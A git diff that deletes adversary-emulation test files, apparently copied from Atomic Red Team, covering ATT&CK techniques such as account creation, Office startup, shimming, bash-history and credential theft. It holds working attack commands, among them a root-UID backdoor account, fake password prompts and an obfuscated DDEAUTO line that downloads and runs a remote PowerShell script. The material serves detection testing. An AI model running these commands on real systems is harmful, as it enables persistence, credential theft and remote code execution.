-| computer_name | Computer name to find a mount on. | string | computer1|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-df -aH
-smbutil view -g //#{computer_name}
-showmount #{computer_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Network Share Discovery command prompt
-Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
-Upon execution avalaible network shares will be displayed in the powershell session
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| computer_name | Computer name to find a mount on. | string | localhost|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net view \\#{computer_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Network Share Discovery PowerShell
-Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
-Upon execution, avalaible network shares will be displayed in the powershell session
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| computer_name | Computer name to find a mount on. | string | localhost|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-net view \\#{computer_name}
-get-smbshare -Name #{computer_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - View available share drives
-View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net share
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1136.md b/Atomic_Threat_Coverage/Triggers/T1136.md
deleted file mode 100644
index 5cef97b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1136.md
+++ /dev/null
@@ -1,203 +0,0 @@
-# T1136 - Create Account
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
-<blockquote>Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
-
-In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
-
-### Windows
-
-The <code>net user</code> commands can be used to create a local or domain account.
-
-### Office 365
-
-An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Create a user account on a Linux system](#atomic-test-1---create-a-user-account-on-a-linux-system)
-
-- [Atomic Test #2 - Create a user account on a MacOS system](#atomic-test-2---create-a-user-account-on-a-macos-system)
-
-- [Atomic Test #3 - Create a new user in a command prompt](#atomic-test-3---create-a-new-user-in-a-command-prompt)
-
-- [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell)
-
-- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid)
-
-
-<br/>
-
-## Atomic Test #1 - Create a user account on a Linux system
-Create a user via useradd
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of the user to create | String | evil_user|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-useradd -M -N -r -s /bin/bash -c evil_account #{username}
-```
-
-#### Cleanup Commands:
-```bash
-userdel #{username}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Create a user account on a MacOS system
-Creates a user on a MacOS system with dscl
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of the user to create | String | evil_user|
-| realname | 'realname' to record when creating the user | String | Evil Account|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-dscl . -create /Users/#{username}
-dscl . -create /Users/#{username} UserShell /bin/bash
-dscl . -create /Users/#{username} RealName "#{realname}"
-dscl . -create /Users/#{username} UniqueID "1010"
-dscl . -create /Users/#{username} PrimaryGroupID 80
-dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
-```
-
-#### Cleanup Commands:
-```bash
-dscl . -delete /Users/#{username}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Create a new user in a command prompt
-Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
-new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of the user to create | String | T1136_CMD|
-| password | Password of the user to create | String | T1136_CMD!|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-net user /add "#{username}" "#{password}"
-```
-
-#### Cleanup Commands:
-```cmd
-net user /del "#{username}" >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Create a new user in PowerShell
-Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
-new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of the user to create | String | T1136_PowerShell|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-New-LocalUser -Name "#{username}" -NoPassword
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Create a new user in Linux with `root` UID and GID.
-Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of the user to create | String | butter|
-| password | Password of the user to create | String | BetterWithButter|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
-echo "#{password}" | passwd --stdin #{username}
-```
-
-#### Cleanup Commands:
-```bash
-userdel #{username}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1137.md b/Atomic_Threat_Coverage/Triggers/T1137.md
deleted file mode 100644
index bbe5dfa..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1137.md
+++ /dev/null
@@ -1,90 +0,0 @@
-# T1137 - Office Application Startup
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1137)
-<blockquote>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
-
-### Office Template Macros
-
-Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
-
-Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
-
-Word Normal.dotm location:<code>C:\Users\\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>
-
-Excel Personal.xlsb location:<code>C:\Users\\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>
-
-Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
-
-An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
-
-### Office Test
-
-A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)
-
-<code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
-
-### Add-ins
-
-Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)
-
-Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
-
-### Outlook Rules, Forms, and Home Page
-
-A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-
-Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
-
-Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
-
-To abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - DDEAUTO](#atomic-test-1---ddeauto)
-
-
-<br/>
-
-## Atomic Test #1 - DDEAUTO
-
-TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
-
-SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
-
-Word VBA Macro
-
-[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Run it with these steps! 
-1. Open Word
-
-2. Insert tab -> Quick Parts -> Field
-
-3. Choose = (Formula) and click ok.
-
-4. Once the field is inserted, you should now see "!Unexpected End of Formula"
-
-5. Right-click the Field, choose "Toggle Field Codes"
-
-6. Paste in the code from Unicorn or SensePost
-
-7. Save the Word document.
-
-9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
-
-10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1138.md b/Atomic_Threat_Coverage/Triggers/T1138.md
deleted file mode 100644
index 5b483e2..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1138.md
+++ /dev/null
@@ -1,150 +0,0 @@
-# T1138 - Application Shimming
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1138)
-<blockquote>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. 
-
-A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
-
-* <code>%WINDIR%\AppPatch\sysmain.sdb</code>
-* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>
-
-Custom databases are stored in:
-
-* <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>
-* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>
-
-To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Application Shim Installation](#atomic-test-1---application-shim-installation)
-
-- [Atomic Test #2 - New shim database files created in the default shim database directory](#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory)
-
-- [Atomic Test #3 - Registry key creation and/or modification events for SDB](#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb)
-
-
-<br/>
-
-## Atomic Test #1 - Application Shim Installation
-Install a shim database. This technique is used for privilege escalation and bypassing user access control.
-Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run 
-the AtomicTest.exe from the <PathToAtomicsFolder>\T1138\bin directory. You should see a message box appear
-with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review
-the source code files is the <PathToAtomicsFolder>\T1138\src directory.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | Path to the shim database file | String | PathToAtomicsFolder&#92;T1138&#92;bin&#92;AtomicShimx86.sdb|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sdbinst.exe #{file_path}
-```
-
-#### Cleanup Commands:
-```cmd
-sdbinst.exe -u #{file_path}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Shim database file must exist on disk at specified location (#{file_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
-```
-##### Description: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
-##### Check Prereq Commands:
-```powershell
-if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - New shim database files created in the default shim database directory
-Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
-
-https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
-Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
-Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Registry key creation and/or modification events for SDB
-Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
-the registry keys that were created. These keys can also be viewed using the Registry Editor.
-
-https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
-New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
-Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1139.md b/Atomic_Threat_Coverage/Triggers/T1139.md
deleted file mode 100644
index 5663ce1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1139.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# T1139 - Bash History
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1139)
-<blockquote>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Search Through Bash History](#atomic-test-1---search-through-bash-history)
-
-
-<br/>
-
-## Atomic Test #1 - Search Through Bash History
-Search through bash history for specifice commands we want to capture
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
-| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
-| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1140.md b/Atomic_Threat_Coverage/Triggers/T1140.md
deleted file mode 100644
index 706ba90..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1140.md
+++ /dev/null
@@ -1,90 +0,0 @@
-# T1140 - Deobfuscate/Decode Files or Information
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1140)
-<blockquote>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.
-
-One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)
-
-Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
-
-Payloads may be compressed, archived, or encrypted in order to avoid detection.  These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Deobfuscate/Decode Files Or Information](#atomic-test-1---deobfuscatedecode-files-or-information)
-
-- [Atomic Test #2 - Certutil Rename and Decode](#atomic-test-2---certutil-rename-and-decode)
-
-
-<br/>
-
-## Atomic Test #1 - Deobfuscate/Decode Files Or Information
-Encode/Decode executable
-Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable | name of executable | path | C:&#92;Windows&#92;System32&#92;calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-certutil -encode #{executable} %temp%\T1140_calc.txt
-certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe
-```
-
-#### Cleanup Commands:
-```cmd
-del %temp%\T1140_calc.txt >nul 2>&1
-del %temp%T1140_calc_decoded.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Certutil Rename and Decode
-Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable | name of executable/file to decode | path | C:&#92;Windows&#92;System32&#92;calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-copy %windir%\system32\certutil.exe %temp%\tcm.tmp
-%temp%\tcm.tmp -encode #{executable} %temp%\T1140_calc.txt
-%temp%\tcm.tmp -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe
-```
-
-#### Cleanup Commands:
-```cmd
-del %temp%\tcm.tmp >nul 2>&1
-del %temp%\T1140_calc.txt >nul 2>&1
-del %temp%T1140_calc_decoded.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1141.md b/Atomic_Threat_Coverage/Triggers/T1141.md
deleted file mode 100644
index 1aca40c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1141.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# T1141 - Input Prompt
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1141)
-<blockquote>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).
-
-Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - AppleScript - Prompt User for Password](#atomic-test-1---applescript---prompt-user-for-password)
-
-- [Atomic Test #2 - PowerShell - Prompt User for Password](#atomic-test-2---powershell---prompt-user-for-password)
-
-
-<br/>
-
-## Atomic Test #1 - AppleScript - Prompt User for Password
-Prompt User for Password (Local Phishing)
-Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - PowerShell - Prompt User for Password
-Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
-
-Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Creates GUI to prompt for password. Expect long pause before prompt is available.    
-$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
-# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
-write-warning $cred.GetNetworkCredential().Password
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1142.md b/Atomic_Threat_Coverage/Triggers/T1142.md
deleted file mode 100644
index b1aa942..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1142.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# T1142 - Keychain
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1142)
-<blockquote>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
-
-To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Keychain](#atomic-test-1---keychain)
-
-
-<br/>
-
-## Atomic Test #1 - Keychain
-### Keychain Files
-
-  ~/Library/Keychains/
-
-  /Library/Keychains/
-
-  /Network/Library/Keychains/
-
-  [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
-
-  [Keychain dumper](https://github.com/juuso/keychaindump)
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-security -h
-security find-certificate -a -p > allcerts.pem
-security import /tmp/certs.pem -k
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1143.md b/Atomic_Threat_Coverage/Triggers/T1143.md
deleted file mode 100644
index c1fbb11..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1143.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# T1143 - Hidden Window
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1143)
-<blockquote>Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.
-
-### Windows
-There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.  (Citation: PowerShell About 2019)
-
-### Mac
-The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Hidden Window](#atomic-test-1---hidden-window)
-
-
-<br/>
-
-## Atomic Test #1 - Hidden Window
-Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
-Upon execution a hidden PowerShell window will launch calc.exe
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Start-Process #{powershell_command}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1144.md b/Atomic_Threat_Coverage/Triggers/T1144.md
deleted file mode 100644
index f330808..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1144.md
+++ /dev/null
